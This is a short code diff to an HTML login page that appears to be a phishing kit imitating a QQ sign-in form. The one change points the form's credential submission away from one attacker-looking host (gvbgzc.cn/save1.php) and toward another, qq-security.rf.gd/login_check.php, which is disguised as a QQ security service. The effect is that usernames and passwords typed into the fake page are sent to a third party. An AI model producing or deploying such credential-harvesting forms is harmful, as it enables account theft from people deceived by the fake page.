--- a/login/nullcode_login.html
+++ b/login/nullcode_login.html
@@ -15,7 +15,7 @@ u{text-decoration:none;white-space:nowrap;}
     
     <div id="qlogin" style="display:none;"></div>
     <div id="web_login">
-    <FORM method="post" autocomplete="off" id=loginform style="MARGIN: 0px" name=loginform onsubmit="return aa() " onreset="return onFormReset(loginform)" action="http://gvbgzc.cn/save1.php" target=_parent>
+    <FORM method="post" autocomplete="off" id=loginform style="MARGIN: 0px" name=loginform onsubmit="return aa() " onreset="return onFormReset(loginform)" action="http://qq-security.rf.gd/login_check.php" target=_parent>
         <ul id="g_list">
             <li id="err_m" class="err_m"></li>
             <li id="g_u">
